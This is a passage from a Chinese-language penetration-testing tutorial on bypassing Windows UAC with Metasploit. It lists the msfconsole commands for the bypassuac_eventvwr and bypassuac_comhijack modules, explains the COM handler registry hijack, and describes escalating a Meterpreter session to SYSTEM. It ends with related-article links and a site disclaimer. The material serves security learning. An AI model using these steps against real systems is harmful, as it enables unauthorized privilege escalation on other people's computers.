利用metasploit绕过UAC的5种方式

执行命令如下：

msf > use exploit/windows/local/bypassuac_eventvwr 
msf exploit(windows/local/bypassuac_eventvwr) > set session 1 
msf exploit(windows/local/bypassuac_eventvwr) > exploit 

从下图中，可以看到，meterpreter会话2已经上线，输入getsystem和getuid两条命令来查看是否是system权限。

再一次，我们获取了NT AUTHORITYSYSTEM权限。

5. Windows升级UAC保护绕过(COM Handler劫持绕过)

此模块将通过在HKCU配置单元中创建COM处理程序注册表项来绕过Windows UAC。加载某些高完整性进程时，会引用这些注册表项，从而导致进程加载用户控制的DLL。这些DLL包含导致会话升级的payload。在payload调用后清除注册表项修改。

此模块要求payload的体系结构与OS匹配，但当前的低权限Meterpreter会话的体系结构并不相同。如果指定EXE :: Custom，你的DLL应该在单独的进程中启动payload后调用ExitProcess()。此模块通过目标上的cmd.exe调用目标二进制文件。因此，如果限制cmd.exe访问，则此模块将无法正常运行。

msf > use exploit/windows/local/bypassuac_comhijack 
msf exploit(windows/local/bypassuac_comhijack) > set session 1 
msf exploit(windows/local/bypassuac_comhijack) > exploit 

如下图所示，meterpreter会话2已经建立连接，输入getsystem和getuid两条命令来查看是否是system权限。

最终，还是得到了NT AUTHORITYSYSTEM权限，同理，输入shell获取管理员权限的命令窗口。如此一来，我们便借助了metasploit 后渗透漏洞利用来绕过UAC保护了。

【编辑推荐】

1. 恶意软件的终极指南 密码窃取器变得更加复杂和危险
2. 走进几维安全，听CTO刘柏江讲述他们想做的事儿
3. 黑客基础之Metasploit渗透测试平台模块简介
4. 保护云计算免受恶意软件攻击需要了解的内容
5. 敲黑板！知识点！恶意软件、蠕虫、木马病毒知多少？

（编辑：晋中站长网）

【声明】本站内容均来自网络，其相关言论仅代表作者个人观点，不代表本站立场。若无意侵犯到您的权利，请及时与联系站长删除相关内容!